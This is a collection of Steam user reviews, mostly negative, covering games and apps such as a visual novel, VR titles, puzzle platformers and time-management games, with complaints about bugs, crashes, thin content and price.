Finally this absolute classic from my youth is available on steam and I thought I couldn't be happier. However, there seem to be significant bugs. Espionage never seems to be available, all illegal activities seem to be bugged to always fail, and a lot of tool tips have removed most nuance from the game. It's almost as if this kid's game has been made even more for kids. I'm glad I could get back to this game, but I wish the adaptation was focused less away from making it a neutered experience.
After playing through "If My Heart Had Wings" I was looking forward to seeing what this novel had in store.While I was playing, I was consistently bored and sometimes even frustrated by the characters, and now that it's been a few years since I read it, I can safely say that the story was forgettable in almost every way. I remember lots of details about the story for "If My Heart Had Wings," but in this VN, the only things I remember are the heterochromia girl being insecure as a child, the main character living in the Astronomy Club room, and attempting to rent out the planetarium for some reason.Overall, 3/10, would not recommend. It's boring, forgettable, and your time is better spent elsewhere. I'm a speed reader, and it took me 24.5 hours to read through this, and 80% of the game felt like a slog.
♥♥♥♥ games look like this.
Trash, just complete trash and I can't get a refund. Steer well clear of this diabolical attempt at making a 'HOT' VR game, it's complete rubbish. I get turned on more by Lego!
Pleasant visually, has lovely music, but overall falls a little short. Some of the puzzles are interesting but mostly they're pretty basic. A hint system is included - it requires spending gems that you find by exploring levels - but for me it went unused.As for those gems, there are achievements for collecting all of them per level. You aren't given a counter, and only find out how many there are, and if you missed any, after completing a level. This was particularly frustrating in a sprawling valley level, with a large maze in one section of it. The extra time I put into finding the ones I did went completely wasted. What made me laugh is that after that I gave up on the gems, yet managed to find them all in the next level without even trying.Controls are fine but a little wonky, when some puzzles require you to have relatively precise footing. Bafflingly, there is an option to change the camera Y inversion, but not X.Also missing from the options menu is a way to reduce or remove bloom. I spent the entirety of the second level squinting.I'd give it a neutral rating if I could. Would probably be a great game for kids of a certain age.
21gb "hotfix", numerous bugs, sometimes the multiplayer was unplayable..the game is awesome... when it works... which is about 5% of the overall time.i would recommend it if it worked, but the game is just a massive mess of bugs which ruin everything good from the game.also this game has a ton of micro-dlc, even for base mechanics..the experience at first seems fun but deeper into the game it gradually worsens as bugs seem to pop out from everywhere the more you play and notice them.support the devs when they actually nail the bugs down, and stop reintroducing bugs with every update. from the amount of extra bugs you get with every update, it seems they won't even bother to test them in depth.
This game can offer you so much joy! It has some cons and pros which I will mention in the following lines.At the beginning I said; "Meh! Is this another mobile game find a way to be on steam store?" Yet, and after certain levels, I've found out that I was wrong, and the game has an obvious potential to be as entertaining as it should be! The puzzles are unique, and sometimes they have more than one way to be solved. The cute characters something you cannot turn a blind eye on. The idea that the different characters are not just to fill the game, and you actually need their abilities to solve the puzzles is brilliant! YET, and here come the cons, the game is not "fully" a control friendly! You still need to use the keyboard to transport your characters, and to switch between characters, which turned out to be frustrating when it comes to solving some of the puzzles that require you to be as fast as you could be, and as a platformer game, a keyboard isn't even a choice here!The spikes! OH GOD, these are a pain in the neck! I think they need to be fixed, or even reworked since it killed all of my characters from a quite distance!The artifacts seem to be glitched because they disappear after 4+ deaths in a row!Finally, it took me a while to decide whether I should recommend the game or not, but since it is an early access game, and because the cons stopped me from completing the game, I wouldn't recommend it now. I am 100% this game would be worth every penny after polishing it.
First impressions: Eh...It's not very well optimized, very confusing and at times glitchy AI, but it seems like it has a lot of potential. IMO, it should've been released as an early access game first to iron out the bugs and lack of direction it gives, but I'll be writing a full review of this game once the extended tutorial and more game levels are out. All the maps look pretty much the same and the world generation needs some work. As of now, it's quite barebones and doesn't hold much substance to it. Great concept, however. Buy at your own risk.
Horrible- just horrible- This is no bike simulator- there's less control than a bloke with no legs sat in a cauldron trying to get over things using a sledge hammer.....seriously- did the Dev learn to ride a bike as a child? Or did his Dad make him drink 2litres of Vodka before allowing him to get on the saddle?From the nasty clipping through the starting caves vertical sides the outside world looks lovely- however I am perpetually stuck in said cave getting frustrated by the camera, the bikes random brownian movement and the sense that my bicycle is actually possessed by a blind, paraplegic, ampthetamine addled poltergeist......Still.....at least the music is decent.....though as its non- copyrighted free classical  music it should be.....edit- having exited the cave to the 24fps splendour of jerkiness crossed with a brain damaged child's drawing I now wish I'd stayed in the cave......Nice one ♥♥♥♥♥ of the Wild- you're my 1st refund in almost 500 games and 7+ years
Read reviews comparing the game to FTL. This game is no where near the same as FTL for replay or challenge. By the end all your doing is waiting for your ship to repair itself before you kill the last enemy to start the next wave. The crew alocation is also rather shallow you just load your ship up with 20 crew members and fill every slot not much depth to it. Also there are more than a few bugs including the inability to finish the last fight at times due to "target" glitches.Interesting idea that fell flat.
Too simple to be worthwhile.
Far too many obstacles and hindrances right off the bat. You make it like 10 feet before you are eaten by a seal, smashed into ice, fall through ice, etc... Also the early upgrades you get are basically useless and it is almost impossible to earn money. Perhaps if they greatly lowered the early game difficulty it could be fun but at the moment it just isn't.
Literally, the first time of my life, am I writing a review due to my dissappointment to the game I bought and only after a few minutes I can tell that I am hating it.There are NO INGAME instructions how-to-play nor are there any tutorials. The game is left into a mess where you are forced to l2p, which I am fine tbh. But having NO HINTS, I am unfortunately unable to figure it out without proper interest.I do LIKE AND LOVE, the idea of the game, that is really good thing and the reason WHY I bought it in the first place, but as long as there are no REASON to play the game, I refuse to play it any further without proper guidance. I believe the developer took the time to make the game and had a clear and good vision, but the execution right now is just TRASH.If you manage to perfect the game, you can count on me to re-buy it and see if you did what I was looking for at the first place, but for NOW; Sorry on, I can't recommend it, maybe in future ?
I love management simulator games, but I find this game to be frustrating in its current iteration. Starting out as a specialist, it seems extremely easy to fail early game tasks. The money you earn from freelance tasks can't seem to keep up with business expenses. Perhaps I haven't put enough time into the game to learn what I'm doing wrong, but I think the early game could be toned down a bit to ease players into the game and encourage them to keep playing longer. I hate to give this game the thumbs down but I just can't recommend it right now.
This game is 10 dollars for three different levels. Let that sink in. The game is like Goat Simulator, in that it's just a silly broken kind of game. But has so little content compared to Goat Simulator, and the graphics look like a 1-3 dollar game. I'm not saying the game is bad because of the graphics. I'm just saying how low budget this game is. I wouldn't recommend for it's full price. If it's on a very huge sale. Than maybe pick it up. But otherwise ignore it and just get other silly broken games.
I love the games that this developer puts out, but this one is just not nearly as polished as it should be. The concept is interesting and the story has so much potential. It's sad, really, that the execution seems so rushed, yet nothing is ever explained. Granted, I haven't completed the game (got through 38 of 60 lvls), so I don't know if it gets infinitely better towards the end or not, but so far it has been a mess. Cutscenes that doesn't resolve anything and ends abruptly, character designs messing up (default shirt and gala-dress mixing together), broken minigames that doesn't give all of the hearts that you should get, thus decreasing your score... It leaves a lot to be desired and I honestly think that it's a shame, because it had the potential to be an awesome title like the Delicious-, Fabulous- or Heart's Medicine-series.
A very interesting tool that has a lot of potential. But should definitely be classified as early access due to the lack of content. I'd say that it is not worth even half of the current price ($13). Keep your eye on it though.Pros: The tiles and interface look really good, and it's really easy to use. The maps you can build can look really great. Cons: Not enough tile options, especially with biomes. The height limit is annoying. Slow Loading. Rivers are weird looking &amp; glitchy when above sea level.
Great game, but I bought this for pool and the physics need a lot of work.  When i push the button to lock position on the cue ball, it often moves to the left or right, almost as if its impossible to hit the ball exactly where I want to.  I might pay 5 dollars for this, but not 20.  Sorry, I really wanted to like this one...
High difficulty ≠ fun.Maybe I'm just crap at platformers, but this one is seriously difficult. It's actually painful to play especially once you get into the later levels. I only bought it because it was $1, and I love Super Meat Boy, so naturally I thought it would be at least a little playable.I thought wrong.
I got this to assist with my Pathfinder tabletop gaming and found the user interface to be unwieldy as well as hard to learn. It also crashed often. If there had been a good user tutorial or the menu was more user friendly, it might have been ok.
A cute sort of clicker game that I would have enjoyed more if not for the fact that once you get all the shop upgrades and spells, that's about all there is to this game other than leaving it running to get achievments.The art style and such are really nice, the music is pleasant.But that's about it.
Watching Delusion certainly shows potential as a puzzle game. It has the right kind of simplistic premise to be compelling in and of itself. However, the additional obstacles that get introduced can be a tad unintuitive and once the game decides to really crank up the difficulty by combining all these various requirements in order to solve the puzzles, it gets tedious fairly fast.A bunch of the additional “mechanics” are just obfuscation of information, which is never a good sign for a puzzle game. Others do tax your spatial awareness somewhat and as such are much more welcome. However, at some point, the game just forces so many different parameters at you, that your eyes will start glazing over as you simply do the old trial-and-error routine, which is never a good sign for a puzzle game. As such, I can’t really recommend this title as is. Especially because the soundtrack becomes rather grating and has a nasty habit of switching between tracks without warning in the middle of a level.
Great concept, awful game.2/10 has some memes
An Idle-genre game for someone who really is into them. There's literally nothing happening on the screen, almost no action - just numbers counting up and green ones when you actually tap something. Prestige system allows you to kill your time once more, but the numbers will count up faster. You're practically just looking at an algorythm, but it's got icons.It wouldn't be interesting for most players out there, but if you're looking for a calm idle game, this kind of matches the price tag.
I was excited to find an app to show some detail of Rome in the past, with all of its buildings and glory. Well... this app really needs more work. The graphics are very poorly optimized and run poorly on my system, causing jitter and loss of controller tracking within about 15 seconds. What very little I could see looks promising. This is definitely a labor of love. It just needs much much more work. Not worth the price even if it were half what I paid.
[ 中文 / english ]*中文：内容太少，不值价钱，不建议入手当你可以化身一只猫，我以为我能做更多事情（至少让我和树屋里的东西互动下啊）虽然可能会有人说这是一种奇怪的放松的体验，但是场景如此单一重复，操控也并非舒畅，实在不敢苟同如果有更多关卡，更多场景环境，更多路线，更多作为猫能感受的东西，更多秘密，也许会好很多猫猫暖暖，但真的内容太少了太太太太太少了，我很期待的来着*English：lack contentnot worth the pricewhen i can be able to play as a cat , i was really expecting moreat least let me interact with things in the treehouse!!though some might say that the game can be a weird experience as relaxation ,  the scenes are just repeating too much , also the control is not comfortable enough if there is going to be more levels , more places to hang out , more paths , more things to feel as a cat , more secrets to findthe game would be better
Splurted review for public eyes.Little to no survival, enemies and so forth. Your main goals will be working towards crafting gear so you can look pretty. I haven't played since March but I can tell you the world is pretty dead despite towns.Coop is fairly stable and lots of fun but again there's nothing to do. You wander around without a real goal, kill one enemy (Maybe two or three now) get lost at a dead end then return home to craft some more.There's a few areas that area a lot of fun and mostly populated. One of these areas is the desert and boy golly you will be trapped there forever unless you came equipped. I remember at some point we ran out of light or broke our weapons deep inside some cave.There is no base building, I believe you eat but it's not 100% necessary.Not really interested in hopping back in just wanted to destroy these devs for failing to support their project.  Oh by the way Olorun hasn't had an update in months and I would say almost a whole year now. Report for abandonware.
Some ok levels, some are just stupid.  No ability to reroute enemies, just guessing which weapons to use, and using abilities, which randomly are provided, so sometimes you can't win.  Some things happen off the map (playing 1920X1200).  The level where you count the types is an example, on my PC version it never showed the numbers on the rocks for you to match!  Lots of work needed...
I'd rather call this a joke instead of a gamePlayer Bases:☐ Kids.☐ Everyone.☐ Mature.☑ Casual Players.☐ Pro players.Graphics:☑ Potato.☐ Really Bad.☐ Bad.☐ OK.☐ Good.☐ Beautiful.☐ Masterpiece.Price:☐ Full Price.☐ Wait For Sale.☐ Refund It If You Can.☑ Don't Buy It.☐ Free.Requirements:☑ Minimum.☐ Medium.☐ Fast.☐ High End.☐ Super Computer.Difficulty:☑ Easy.☐ Medium.☐ Hard.☐ Very Hard.☐ Death March.☐ Dark Souls.Game length:☑ Really Short. ( 0 - 3 hours)☐ Short. ( 2 - 8 hours)☐ Medium. ( 8 - 16 hours)☐ Long. ( 16+ hours)☐ Endless.Story:☑ It Doesn't Have One.☐ Horrible.☐ Ok.☐ Average.☐ Good.☐ Fantastic.Cinematic/Art:☑ It Doesn't Have.☐ Horrible.☐ Ok.☐ Average.☐ Good.☐ Like Watching A Movie.Music/Sound:☐ Horrible.☑ Decent.☐ Average☐ Good☐ Amazing.Gameplay:☑ Terrible.☐ Ok.☐ Average.☐ Good.☐ Fantastic.Bugs:☐ Game Itself Is One Big BUG.☐ Game Breaking Bugs.☑ Lots of bugs.☐ Few Bugs.☐ Nothing.Final:☑ Terrible.☐ Ok.☐ Average.☐ Good.☐ FantasticOthers:Multiplayer: ☐Singleplayer: ☑Final Score:1,75/10
Bro.... The question was 'which team play in red and white striped shirt and blue shorts'. We answered atletico and it came up as wrong and said the answer was Bayern. WTFRICK ?
I wonder what the hell you changed the entire game for? It's some sort of awful survival RPG now, and even accessing the original game is kinda boring. You had a lot of opportunities to make this good.
Lovely Planet Arcade is fun for the short while until you hit world 3. At that point, they up the difficulty artificially by tossing really annoying enemies and patterns at you, and unfortunately the music gets surprisingly repetitive to boot. In world 3, there will be enemies that are completely invisible and use hitscan weapons that will force trial and error. Then they'll introduce enemies that blind you until you perform a certain action like picking up coins. This leads to level designs being unclear as you can't even see the level for portions. It's a shame because it's so easy to see the potential of a fun arcadey lovely planet classic FPS inspired shooter, and you can see successfully creative designs in plenty of the levels, but the mechanics introduced in zones 3 and 4 are just that terrible.All this said, I highly recommend checking out Lovely Planet or Lovely Planet 2 if you haven't already. Excellent games. (Haven't tried Super Lovely Planet yet myself, will do)
The music is very nice but this game crashes more than a drunk driver who's blind. I've only played for 32 minutes but it crashed SIXTEEN TIMES.
I have to admit, Im not enjoying this game. I loved the first game. This one misses the magic. The music is annoying and repetitive. the songs go from sounding like Old 8 bit NES music to sounding like a rejected Mass Effect sound track... maybe Im just getting old.
This is less about puzzling and more about a big terrible maze. I got to this one part where the puzzle was just an invisible platforming challenge, and it was then that I noticed the game had a timer.. I spent a half hour in there and the timer ran out and sent me back to the beginning.You get a map that draws itself out when you go through the maze but it has no pointer to tell you where on it that you are.It's no fun,, I would compete for the prize if it was at least a little enjoyable but it just isn't.So no, you can't pay me 11,849 dollars and 80 cents to play this.
AVOID LIKE THE PLAGUE. Badly broken, severely bugged, and much talk and little action from the devs in terms of patching.So why am I clicking "Recommend"? Well, it's simply because it's the only way to leave a review of any kind. If I could leave an "Under no circumstances recommend" I would.UPDATE: I can now leave a review and choose whether to recommend or not. So it at last gets the thumbs-down it deserves.
worst game i bought
It requires too much trial and error method to solving the puzzles, and failure resets the entire game.The first zone was fine, the third or fourth puzzle was to hold a button, the only cool instance of using the clone to solve a puzzle.The second zone was a giant maze, it takes forever to go anywhere IF you know where you are going, so you hold shift to run, making deadly clones running amok in a maze while you are lost in it. You don't lose instantly if a clone just glances at you but in this maze unless you play ultra slow to give yourself a room to run the other direction there is absolutely no way to properly solve it. I just flipped the table and uninstalled.There was some major lag spikes in the maze, I imagine this could be a problem for those playing in VR.If they made that a paradox only undone the last loop, as in every time loop was a checkpoint, it could be a very awesome puzzle game. But no, it plays like a roguelite starting from scratch on a single mistake, as in the case of the maze, a mistake that you hardly prevent without serious trial and error memorization.
Spent 99 cents on this game. I feel like I overpayed! It mostly consists of watching the same attack animation over and over.
These are hardly even puzzles. They are obnoxiously easy, and if you do a puzzle wrong, the solution becomes immediately obvious on the second try. I'm ashamed I spent money on this.
gg.net eat ass lol memes
Personally, I can not say I enjoyed my lack of time with STANDBY. I know I didn't play that much but seven levels in and I can already tell with numerous hints that this was going to be a bad game.A little bit of insight, to prove that this is not my lack of skill making me hate how this game is hard - I can say I completed VVVVVV and the majority of Super Meat Boy (save for the bonus seventh world). I tried You Have to Win the Game and failed because of weird invisible platforms. But I digress.What we came here today was to figure out what makes STANDBY feel like a sore thumb in what should be a clean hand of shining examples for hard platformers.And that, my friends, would be the controls. Gameplay The gameplay is, arguably, the most important aspect of the format STANDBY is utilizing. There are three controls for the most part; run, jump, shoot. The issue, however, is how these controls work in unison. If you shoot while running, you will instead perform a slide, which you can only shoot within the slide. This slide lets you cross red barriers in your way, making it a nessecity for a trap commonly thrown at you. I found myself hunting for a long time trying to get a single key that would otherwise be easy to earn if this slide was more precise. If you slide and jump, you dive to the ground. This is the real bugger, my friends. You will commonly find yourself trying to slide, but since you have already jumped, and you will probably be sliding to jump over a red barrier, instead you will dive into a red barrier. This will be one of the most common ways you die. This is a big problem because it feels like a stupid mistake. If you fall off a tough platform, you want to get past it so you have bragging rights. But theres no competition against a stupid mistake killing you. If anything, it drives you farther away from the game you want to play. These stupid mistakes only caused by the developers trying to lessen how many buttons get pressed discourage smart play trying to figure out a puzzle, because odds are you will know what to do but you die anyway because you accidently dived instead of slided, or shooted even. This game needs precision, as any good tough-as-nails platformer requires. However, this precision is thwarted by just how fast the protagonist goes. Another stupid mistake you'll come across is slipping into a red barrier without a viable way to switch direction. I already covered why stupid mistakes cripple this game, so I won't cover that further. Story Elements There is basically no story in STANDBY, and it doesn't need a narrative to be a good platformer, so I won't take away points for that. The settings are very bland, and the only difference you will notice is the background color.  This game wants you to focus on what you're dodging and it wants you to know. Soundtrack Alright, atleast this game nailed something. The OST of STANDBY is pretty good, although I haven't heard much. Still, it gets points for this just because of that trailer's music.PositiveGood soundtrackEnticing trailerNegativeHorrid controlsNo interesting backgroundsNo story, not even a simple one like SMB Summary Overall, there are a lot of charming qualities that STANDBY presents. If you're a balls-on-the-walls masochist who wants to get directly into the core of the game, STANDBY is probably for you. If that doesn't describe you, then you'll have a hard time enjoying STANDBY.
I absolutely adore HP Space and Weapons shop, so it's very disappointing to admit that I didn't like this one. It's just not very good. The new graphic style they went for was fine, and the comedy and writing is just as good as the other games. However, what this one really suffers from is the actual gameplay. Simply put, it's a very glorified sorting bin. Put the red one in the red bin. The blue one in the blue bin. Once that's done, put them together and wait thirty seconds. That's the whole gameplay cycle. Eventually you get money to upgrade your sorting bins, but that changes nothing except for the quality of items them produce. The timing mechanic doesn't help, either, as you're left making random items hoping that they'll fit the requirements for the next timed event, because otherwise you don't have time to wait for the next item to be produced. Just very boring overall, feels more like a mobile game than anything else.
Unplayable - game has 2 mouse pointers, neother one works on buttons.  (I use windows 7)I couldn't even get through the character creation screen...  Don't waste your money!  ( I already asked for a refund!)
Only Has YouTube...The small environment is nice and relaxing. If you want to stare out in nothingness and enjoy the horizon, this does what it promises. As far as watching videos, it'd be nice if you could link to Netflix, or at the very least watch your own video files. But having a way to watch YouTube in VR is nice if you're okay paying $5 for it.The app isn't bad in that it gives you what it says it will and does it admirably. But when I'm paying money to put a mask on my head and watch something I can do much more easily on my computer I'm already at, I'd hope for a little more.
It is actually, like its predecessor, a great game. and i rarely review games, but as of now, its not worth playing, since some update have left the game stuttering like hell. every menu you go through, freezes the game for 2-5 seconds, and this is something you do alot.. Wanna take prisoners after a battle? 5 second freeze, now check your loot, 5 second freeze now you can ride on. after a 5 second freeze. Oh, you are going into combat? 5 second freeze, then loadtime. out of combat? 5 second freeze, THEN load. when they fix this, i'll remove this review.
I was really hoping to give this game a good review, but alas, I can't.The map(s) are really short, and you come back to them at least twice each. Yes, twice EACH.The castle, OH THE CASTLE. You come back to it a hundred thousand times. You NEED to come back to it after every each mission as the main heroes.Then there's the dialogues. Pretty standard RPG dialogues go to along with the "fetch the relics to save the world" story.Not impressed at all, specially coming from Warfare and Aldorlea.I just played to the end, in the hopes the sequels are a bit better so I can give them a positive review...
This is more a mixed review than a negative one.The gameplay is basically Snake, but in Pac-Man-styled levels. Navigate mazes filled with corridors, collect all the pellets, and reach the exit, all without running into your own body, which elongates as you eat pellets. Familiar with Rattlesnake from Windows Entertainment Pack, which I recall had easier levels, I wanted to see how this compared.It was fun for me in the beginning, but this was because the levels started out small enough that you could see the entire playing field on screen at once. By the time you access world 2 of 3, they become so big that even the zoom button won't show you the whole thing. This is important, because as you progress the levels become trickier, with more bottlenecks that you have to identify and clear early before emptying the rest of the stage. So, there's an increasingly heavy trial-and-error aspect that I don't really like. In addition, Millie's body becomes so long in these larger levels that, in order to eat those last few pellets you're missing, you have to take the long way around the whole area multiple times, just to avoid running into yourself. I've gone from taking 1 or 2 minutes to clear a stage, to taking multiple 5-minute attempts to clear just one, and I'm not even halfway done with the game as of this writing.The zoom button pauses gameplay, and because the default camera is often zoomed in too close to anticipate bottlenecks and such, you'll have to zoom out constantly to make sure you aren't going down the wrong path. Not only does this make the pacing tedious, it suggests the developers wanted to enforce a memory aspect, which again is something I don't really like.There are powerups, like hammers that break cracked walls and sirens that let you go both ways on one-way streets. I was hoping these would add variety to the levels, since there are nearly 100 of them, but they never seemed to make enough of a difference in the gameplay. They activate instantly upon pickup and last less than 30 seconds, so you have to know where to use them first, but again, since the levels become so large, you often have to make a preliminary attempt just to discover all the noteworthy areas. I feel the levels become challenging less by creative use of different mechanics, and more by increasing level size and number of bottleneck areas.If the premise interests you, and the above points don't bother you, go ahead and give it a try. Otherwise, be warned that it becomes much more difficult than the mood of its trailer suggests.
I really shouldn't complain about a game that cost me €3,29, but it is far from the experience it could be (though, if it was, I'd even pay a lot more for it just like some of the other reviewers).Since the game is new, I hope to give constructive feedback and I'd love to change my review as soon as the game gets more refined with a patch, because it deserves better than what it is right now.So let's start with the good things:1. It's a puzzle game really complimented by VR. Of course the gameplay could still be accomplished without virtual reality (And you all know the game that comes to mind here, right?), but it's just more fun the way it is.2. The game is very cute and has those little details that make it a nice experience.3. The music suits the game very well and does add to the experience.4. It's almost an instant buy for the low price it asks.5. You can switch to a first person mode that allows you to take over Alice and view the levels more closely.So, why again am I giving this a negative feedback?1. The first person controls are way too slow to be enjoyable. Sadly, I haven't found any settings to increase the walking speed while in first person mode. Personally, I'd prefer to play in this mode if at least there'd be a way to get Alice running in first person. Tried all the buttons available, but didn't succeed, so I guess it's impossible as of now.2. As beautiful as the graphics are, the game has game-breaking framerate issues. I had to turn down my superscaling settings to 1.0 and still had occasional framedrops that got me motion sick after half an hour of playing the game. I'd expect to get better results with an i7 6700, a GTX 1080Ti and 16GB of RAM, especially from a mere puzzle game. Pretty much all other VR games run fine with supersampling settings of 2.0 or more on my rig, so my guess is that this is due to bad optimization. I really hope that this will be addressed in a future update. I'd also like to point towards my girlfriend, that is a die-hard fan of Alice in Wonderland. I partly bought this game, because I'm sure, she would love playing it, but I know I wouldn't expose her to potential motion sickness due to lag.3. Again, for the price I shouldn't be complaining, but this is one of the rare occasions where I'd like to pay more to get more content. I hope that DLC will be made and that this game turns out to be a must-have for VR gamers, because it definitely has the potential (as long as the other issues stated above are addressed as well, of course).So, that being said I will watch this game regularly and hope that it will get some love by the developers.
Amazing food-based rhythms buuuuuut:THE GOOD:-Food instruements. Really neat.THE BAD:-Requires a large playspace. Don't get this if you have a standing-only configTHE UGLY:-Not really enough content for 12 bucks. There are only 4 levels and you breeze through them in less than 5 minutes.SUMMARY:If you have any small children or anyone who hasn't used VR at all, I guess this would be a neat demo. If you're well into VR games then I would skip this. You're not looking at a whole lot of content here.
♥♥♥♥
UPDATE 13 February 2019: Dev disappeared in October 2017. Without a single message. DO NOT BUY THIS GAME. ==================================ORIGINAL REVIEW:Disclaimer: played over 3 hrs offlineI think that is very promising, considering that is the first release of a one man dev team.Very nice low poly art assetsThe engine is Unity and keyboard controls are ok.Run fine (50 fps) even on an old Nvidia gt120m.Actually 7 levels and one map only but I hope that the Dev will deliver what he promised in store page.Suggestions to Dev:- Change turrets art to some thing more "anti air" style.- Add ability to paint plane: main color, secondary color, logo.- Add ability to choose pilot (male, female, several accessoires: glasses, hats...)- Endless survival mode with turrets and enemy AI planes.
This game is absolutely terrible. Not worth a cent paid... Don't buy this. you will be very disappointed if you do...
just no...
I wish I had taken the time to read the other reviews before purchasing this.Absolutely god-awful terrible for piano. I'm slamming on the keys as hard as I can, and it's barely registering them at all. When it does pick one up, it's halfway through the note I'm supposed to be holding. Where's the logic in that? Let alone that it only lets you play one note at a time, one hand at a time.I mean, if you want a less-fun DDR with a keyboard, go ahead I guess? But if you actually want to learn something... keep looking.
I wonder if anyone else played this game and what the dev offered for a positive review? The mapping is atrocious. Houses are 10 times bigger from the inside and almost empty or unkind. Lots of labyrinth-like paths that took me thrice as long to get through. I was able to run up walls but got stuck when I approached things that shouldn't block me. When there were cut scenes I got ported to an area that doesn't even look like my surroundings and people just decided to disappear after talking to me - because walking away is too mainstream.Fights don't seem that important but I am really glad about it. There is no combat/skill/character balancing. Skills need too much MP (400 of 800 e.g.) but almost all fights are against one mob which is mostly a one-rounder. If there were more they wiped me pretty fast because enemies do way too much damage (sometimes even onehits).I couldn't find a variety of weapons or armor but plenty of healing items instead. Most of them seem useless and overpriced tho. Last but not least it was the story that disappointed me. Dialogues seem forced, unnatural and I am still looking for the humorous parts.At one point the characters started to talk about stuff they never mentioned before which spoilered and confused me. After playing some more another conversation explained what happened back there. Some things happen/are mentioned way too early in the game. The only parts of madness and crazy I found was me playing this.
this game is actually one of the least enjoyable games i've ever played in my life. idk what it was about the game - maybe the fact that it's lazy, there's very few sound effects/sprites, and two of the achievements literally limit your resources and what you can do.feels like it was just a cash grab they made in ms paint. not recommended.
I would love to get in contact with us developer just to tell him the optimization problems I'm having with this game on a 2080 super and R5 2600 overclocked to 4.6 and i'm getting 12 to 1 fps or lower there is a problem here it dose look like it could potentially be really fun the some of the problems that the other reviewer had are now gone (no saves still tho)
Good game, but needs online mode so I have someone else to play it with
I'm sorry but this was just a major let-down. I've become addicted to time management games after playing Hercules and have combed steam inside out for all time management games I could find. I had run out of games when I saw that gnomes garden 2 was released. Oh the joy! I played gnomes garden 1 right after hercules and found it to be a good game I enjoyed. Gnomes garden 2 has NO challange to it whatsoever, I found it to be SO easy I was falling asleep and just fiddeling around with no strategy what-so-ever and still had TONS of time left on the 3 stars. At that rate I don't even see the point of the timer or the stars, it just all feels like a 100% casual game for granny. In addition to that a few maps in, a map to rebuild stonehenge came up. I was fuming. It is a 99%  carbon copy of a map from Gnomes garden 1. If I wanted to play the same maps with the exact same mission again I would just have replayed the first game, then at-least I'd be having fun because I might have to use some effort to beat the timer.I am sad that the game I thought I'd be sitting here playing all night feeding my adiction for time management litterally made me fall asleep. I may be addicted, but there are limits!For anyone looking for other time management games, here's a little list of what you can find on steam:12 labours of HerculesGardens Inc.Roads of romeThe tiny tale 2Northern taleBallad of SolarIsland tribeMOAIViking sagaGnomes garden 1
This game is similar to Life Quest which was a game I loved. You take turns choosing actions to increase your money, healthy happiness and education. You have a limited amount of time each day which is affected by factors like method of travel or debuffs from the cards delivered at the beginning of your turn. Unlike Life Quest, though, this game is pretty bare bones. There just isn't enough content. I've played twice with friends and we've seen everything there is to offer. There's only one job path to make the most money meaning there's no real need to pursue the other areas unless you just feel like it. It's very standard gameplay that doesn't differ per play making it boring quickly. Jobs require certain clothes yet you wear a uniform at the job so that feels like a useless mechanic. Plus clothes are only for the jobs and there's no other reason to buy them nor is there much variety.  The cards at the beginning of your turn are almost always exclusively just you losing money randomly. You never randomly gain any money, only lose it. Overall, it's fun the first time but the entire game could benefit from adding way more. I don't feel like it's worth £10.99 at all.  More variety, more clothes, more options and locations and then it'd be more worth the price.
Absolute Trash, Doesn't Register Half The Time
This is a cute game, and a fun way to improve typing skills, but it's got some SERIOUS bugs!Usually, once the timer runs out, you get a scorecard that says how well you did - your score, accuracy and so on.  If you type too close to the end of the round, it'll just freeze at 0:00 and you'll have to hold escape to get to the menu.   Once this is fixed, I would highly recommend this game for anyone looking to improve their typing!I'm hoping to use it to learn the Dvorak keyboard.
 Achievement Spam Asset Flip Garbage. Do Not Buy! A very bare bones "puzzle" game, that requires you to add your own pictures to the game! Not only that, but you can't just add in any pic, but have to be between certain sizes, only jpg format, and no bigger than 350kb! Not only that, but even with that limitation, it will only load 100 of your own images, but even then I found it still would not load 100 images. The most extra images I've got it to load at once was 40, and I even threw in over 1000 images that met the requirements just so it would load 100 of them, but it did not. You also have to reboot the game for it to load any new images.The game takes awhile to earn 100% achievements as you get an achievement for every 20 pieces put in the correct spot. So you will either be playing the same images over and over and over and over till you get them all, or add your own images to give you something different. Music is boring, which they give you an option to add your own, but honestly at that point, I'll just use my own music app. Death to Achievement Spam Asset Flip Garbage! 
Loved the game in the past, but sadly it no longer works on Win 10.  I've tried all sorts of compatibility settings, but nothing worked.
Today is unfortunately a sad day. This one will be the first review where I feel I can't  recommend it.Everything has it's market and niche. So I can almost always say I would recommend a game, so far, because I can always imagine a person that I would genuinely recommend it too.I can't with this.There isn't a great deal right with it, just... Have you watched the little promo video and seen the screenshots? Great. Now you've played the game. All of it. That's it. That's the entire game right there. Every piece.Other small indie games offer value to the gamer. Tiny Battle SImulator doesn't offer anyone any value unless you're the developers wallet. It’s a glorified game of chess, played against a 2 year old that lets you have 20 moves to their 1.You're paying for a game that is essentially a low end flash game. I've seen and played games like this on flash sites, and frankly mostly better than this (some are quite amazing) more times than I care to remember... and they're all for free.Now hang on, I don't begrudge anyone making money, I run my own business. I encourage people to make money. Just aleast make sure you’re offering actual value, and not just adding pointless refuse to the market though.As it stands, I can't help but feel like this developer has made this  just to jump on the "indie game developer" money train. I couldn't find an someone that I’d recommend this game too, that I wouldn't first recommend a flash site too. Or a cup of tea and a game of chess.I'll be back in 12 months to at least give this developer a fair chance. Until then, I strongly recommend a flash site, or something else.Also, very suspect reviews.(EDIT: February 11th, 2020. Been 12 months, give or take. Given it another go, and it's still just as boring and empty. Not worth your money, folks.)
It got dull pretty quickly. For me I think it is caused by the fact that the link between your action and the results are not clear enough. Also the voice acting is not good.
Not recommended for a few reasons, mainly - the achievements. This is because I am a big achievement hunter so when games do things like THIS game does, it really annoys me. At least 5 of the achievements (maybe more, I forget) require you to get to Rank 1 on the leaderboards in each game type as well as the Overall leaderboards. This is impossible through legitimate play as the current Rank 1 players are clearly hackers, so there is no way for anyone to claim those achievments legitimately. If they had weekly or daily leaderboards it would make much more sense. That being the main reason, this game also fails at what it claims to be "action-puzzle." Sure it can be fast paced but it's almost impossible to do extremely well just because the game lends itself to being a slow paced strategic game. You can't see your next block color, it doesn't have any indication how close you are to losing etc. Which are all sort of staples of said action-puzzle games. Don't buy it 1/10
do not buy unless they can make it work on windows 10. complete pile of garbage.
